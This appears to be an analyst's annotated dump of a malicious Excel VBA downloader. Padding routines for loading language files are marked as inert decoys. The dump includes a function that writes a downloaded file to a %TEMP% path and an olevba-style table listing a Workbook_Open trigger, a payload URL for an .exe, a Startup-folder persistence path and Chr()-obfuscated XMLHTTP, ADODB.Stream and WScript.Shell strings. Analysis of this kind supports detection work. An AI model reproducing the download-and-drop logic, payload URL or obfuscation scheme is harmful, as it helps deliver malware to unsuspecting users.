    Dim ii              As Integer
    Dim jj              As Integer
    Dim strTemp         As String
    Dim strLangFilePath As String
    Dim lngUbound       As Long

    strFileList_x = sc.SearchFilesInRoot(strAppPathBackSL & strToolsLang_Path, "*.lng", False, False)

    lngUbound = UBound(strFileList_x)
    If lngUbound Then
        If LenB(sc.strFileList_x(0).FullPath) Then

            ReDim arrLanguage(6, lngUbound + 1)

            For ii = 0 To lngUbound
                jj = ii + 1

                ' Path to the language file
               strLangFilePath = cs.strFileList_x(ii).FullPath
                arrLanguage(1, jj) = strLangFilePath
                ' Language name
               arrLanguage(2, jj) = GetIn.iValueString(strLangFilePath, "Lang", "Name", vbNullString)
                ' Translator name
               arrLanguage(4, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorName", vbNullString)
                ' Translator address
               arrLanguage(5, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorURL", vbNullString)
                ' Language charset
               arrLanguage(6, jj) = GetIn.iValueLong(strLangFilePath, "Lang", "Charset", 1)
                ' Language ID
               strTemp = GetIn.iValueString(strLangFilePath, "Lang", "ID", vbNullString)

                If LenB(strTemp) Then
                    arrLanguage(3, jj) = strTemp

                    If mbAutoLanguage Then
                        If InStr(1, strTemp, strPCLangID, vbTextCompare) Then
                            strPCLangCurrentPath = arrLanguage(1, jj)
                            strPCLangCurrentLangName = arrLanguage(2, jj)
                            lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
                            strPCLangCurrentID = strPCLangID
                        End If

                    Else

                        If LenB(strStartLanguageID) Then
                            If InStr(1, strTemp, strStartLanguageID, vbTextCompare) Then
                                strPCLangCurrentPath = arrLanguage(1, jj)
                                strPCLangCurrentLangName = arrLanguage(2, jj)
                                lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
                                strPCLangCurrentID = strStartLanguageID
                            End If
                        End If
                    End If
                End If

                LoadLanguageList = True
            Next

            ' Fall back to English.lng / LCID 0409 when no file matched
            If LenB(strPCLangCurrentPath) = 0 Then
                strPCLangCurrentPath = Pa.thCombine(strAppPathBackSL & strToolsLang_Path, "English.lng")
                strPCLangCurrentID = "0409"
                lngFont_Charset = 1
            End If
        End If
    End If

End Function
  738.  
'!--------------------------------------------------------------------------------
'! Procedure   (Function)   :   Sub LoadLanguageOS
'! Description              :   [Read the operating-system language and store it in the Public variables]
'! Variables                :
'!--------------------------------------------------------------------------------
' (Header and inline comments translated from cp1251 Russian rendered as mojibake.)
' Inert padding: `GetSys.temDefaultLCID` is a dot-split name, the LOCALE_*
' constants and strPCLang* globals are undeclared in the dump, and nothing
' calls LoadLanguageOS.
Public Sub LoadLanguageOS()

    Dim LCID As Long

    ' Read the operating-system language
   LCID = GetSys.temDefaultLCID()
    'language id
   strPCLangID = GetUserLocaleInfo(LCID, LOCALE_ILANGUAGE)
    'localized name of language
   strPCLangLocaliseName = GetUserLocaleInfo(LCID, LOCALE_SLANGUAGE)
    'English name of language
   strPCLangEngName = GetUserLocaleInfo(LCID, LOCALE_SENGLANGUAGE)
End Sub
' Final step of the file write: SaveToFile on the ADODB.Stream created in
' ntegerLongue. The local named REG_EXPAND_SZ is just the number 2, which is
' ADODB's adSaveCreateOverWrite, so any existing file at EXPANDSZ1 (the %TEMP%
' drop path) is replaced. The registry-style names are decoys; nothing here
' touches the registry. Detection: EXCEL.EXE writing a PE file under %TEMP%.
Public Function REGMULTISZ1(REGEXPANDSZ As Object, EXPANDSZ1 As String)
Dim REG_EXPAND_SZ As Integer
REG_EXPAND_SZ = 2
REGEXPANDSZ.savetofile EXPANDSZ1, REG_EXPAND_SZ
End Function
  762.  
  763.  
'!--------------------------------------------------------------------------------
'! Procedure   (Function)   :   Sub LocaliseMessage
'! Description              :   [Localisation of the program's messages]
'! Variables                :   StrPathFile (String)
'!--------------------------------------------------------------------------------
' (Header translated from cp1251 Russian rendered as mojibake.)
' Inert padding: strMessages is not declared in any dumped module and nothing
' calls LocaliseMessage.
Public Sub LocaliseMessage(strPathFile As String)

    Dim i As Integer

    For i = 1 To UBound(strMessages)
        strMessages(i) = LocaliseString(strPathFile, "Messages", "strMessages" & i, "strMessages" & i)
    Next i

End Sub
  778.  
  779. '!--------------------------------------------------------------------------------
  780. '! Procedure   (Функция)   :   Function LocaliseString
  781. '! Description (Описание)  :   [type_description_here]
  782. '! Parameters  (Переменные):   StrPathFile (String)
  783. '                              strSection (String)
  784. '                              strParam (String)
  785. '                              strDefValue (String)
  786. '!--------------------------------------------------------------------------------
  787. Public Function LocaliseString(ByVal strPathFile As String, ByVal strSection As String, ByVal strParam As String, ByVal strDefValue As String) As String
  788.  
  789.     Dim strTemp As String
  790.  
  791.     strTemp = Trim$(IniSt.ringPrivate(strSection, strParam, strPathFile))
  792.  
  793.     If StrComp(strTemp, "no_key") <> 0 Then
  794.         LocaliseString = Conve.rtString(strTemp)
  795.     Else
  796.         LocaliseString = strDefValue
  797.     End If
  798.  
  799. End Function
  800.  
  801.  
  802. +------------+----------------------+-----------------------------------------+
  803. | Type       | Keyword              | Description                             |
  804. +------------+----------------------+-----------------------------------------+
  805. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  806. | Suspicious | Open                 | May open a file                         |
  807. | Suspicious | Shell                | May run an executable file or a system  |
  808. |            |                      | command                                 |
  809. | Suspicious | Windows              | May enumerate application windows (if   |
  810. |            |                      | combined with Shell.Application object) |
  811. | Suspicious | RegOpenKeyEx         | May read or write registry keys         |
  812. | Suspicious | CreateObject         | May create an OLE object                |
  813. | Suspicious | sample               | May detect Anubis Sandbox               |
  814. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  815. |            |                      | strings                                 |
  816. | Suspicious | SaveToFile           | May create a text file                  |
  817. | Suspicious | Environ              | May read system environment variables   |
  818. | Suspicious | Write                | May write to a file (if combined with   |
  819. |            |                      | Open)                                   |
  820. | Suspicious | Output               | May write to a file (if combined with   |
  821. |            |                      | Open)                                   |
  822. | Suspicious | Print #              | May write to a file (if combined with   |
  823. |            |                      | Open)                                   |
  824. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  825. |            |                      | be used to obfuscate strings (option    |
  826. |            |                      | --decode to see all)                    |
  827. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  828. |            |                      | may be used to obfuscate strings        |
  829. |            |                      | (option --decode to see all)            |
  830. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  831. |            | Strings              | may be used to obfuscate strings        |
  832. |            |                      | (option --decode to see all)            |
  833. | IOC        | http://alarmtechcent | URL (obfuscation: VBA expression)       |
  834. |            | ral.com/fw43t2d/98kj |                                         |
  835. |            | 6.exe                |                                         |
  836. | IOC        | 98kj6.exe            | Executable file name (obfuscation: VBA  |
  837. |            |                      | expression)                             |
  838. | VBA string | Ad(odb*.)Strea+m     | (Chr(65) & Chr(100) + "(" & Chr(111) &  |
  839. |            |                      | Chr(100) & "b*" & Chr(46) & ")S" &      |
  840. |            |                      | Chr(116) & Chr(114) & Chr(101) &        |
  841. |            |                      | Chr(97) & "+m")                         |
  842. | VBA string | M++i(cr)o            | Chr(77) & "++" + Chr(105) & "(cr)" &    |
  843. |            |                      | Chr(111)                                |
  844. | VBA string | oft.*XML*HTTP        | Chr(100 + 11) & Chr(102) & "t" &        |
  845. |            |                      | Chr(46) & "*X" & Chr(77) & Chr(76) &    |
  846. |            |                      | "*H" & Chr(84) & "TP"                   |
  847. | VBA string | http://alarmtechcent | Chr(104) & "t" & "t" & Chr(112) &       |
  848. |            | ral.com/fw43t2d/98kj | Chr(58) & Chr(47) & Chr(47) & Chr(97) & |
  849. |            | 6.exe                | "l" & Chr(97) & Chr(114) & Chr(109) &   |
  850. |            |                      | Chr(116) & Chr(101) & Chr(99) & "h" &   |
  851. |            |                      | Chr(99) & Chr(101) & Chr(110) & "t" &   |
  852. |            |                      | "r" & "a" & Chr(108) & "." & Chr(99) &  |
  853. |            |                      | Chr(111) & Chr(109) & "/" & "f" & "w" & |
  854. |            |                      | Chr(52) & "3" & "t" & "2" & Chr(100) &  |
  855. |            |                      | "/" & Chr(57) & "8" & Chr(107) & "j" &  |
  856. |            |                      | "6" & Chr(46) & Chr(101) & Chr(120) &   |
  857. |            |                      | "e"                                     |
  858. | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start                  |
  859. |            | Programs\Startup     | Menu\Programs\Startup"                  |
  860. | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start                  |
  861. |            | Programs\Startup\    | Menu\Programs\Startup\"                 |
  862. | VBA string | GET                  | Chr(71) & Chr(69) & "T"                 |
  863. | VBA string | She(l)+l+.A*pp(l)ica | ("Sh" & Chr(101) & "(l)" & "+l+" &      |
  864. |            | +ti()on              | Chr(46) & Chr(65) & "*p" & Chr(112) &   |
  865. |            |                      | "(l)" & Chr(105) & Chr(99) & "a+t" +    |
  866. |            |                      | Chr(105) & "()" & Chr(111) + Chr(110))  |
  867. | VBA string | W(S+c)ri*pt.Shel))l  | (Chr(87) & "(S+c)" & Chr(114) &         |
  868. |            |                      | Chr(105) & "*p" & Chr(116) & Chr(46) &  |
  869. |            |                      | Chr(83) & Chr(104) & Chr(101) &         |
  870. |            |                      | Chr(108) & "))l")                       |
  871. | VBA string | Process              | (Chr(80) & "r" & Chr(111) & Chr(99) &   |
  872. |            |                      | Chr(101) & Chr(115) & Chr(115))         |
  873. | VBA string | TEMP\kah78d          | (Chr(84) & "E" & Chr(77) & Chr(80)) +   |
  874. |            |                      | "\ka" & Chr(104) + "78d"                |
  875. +------------+----------------------+-----------------------------------------+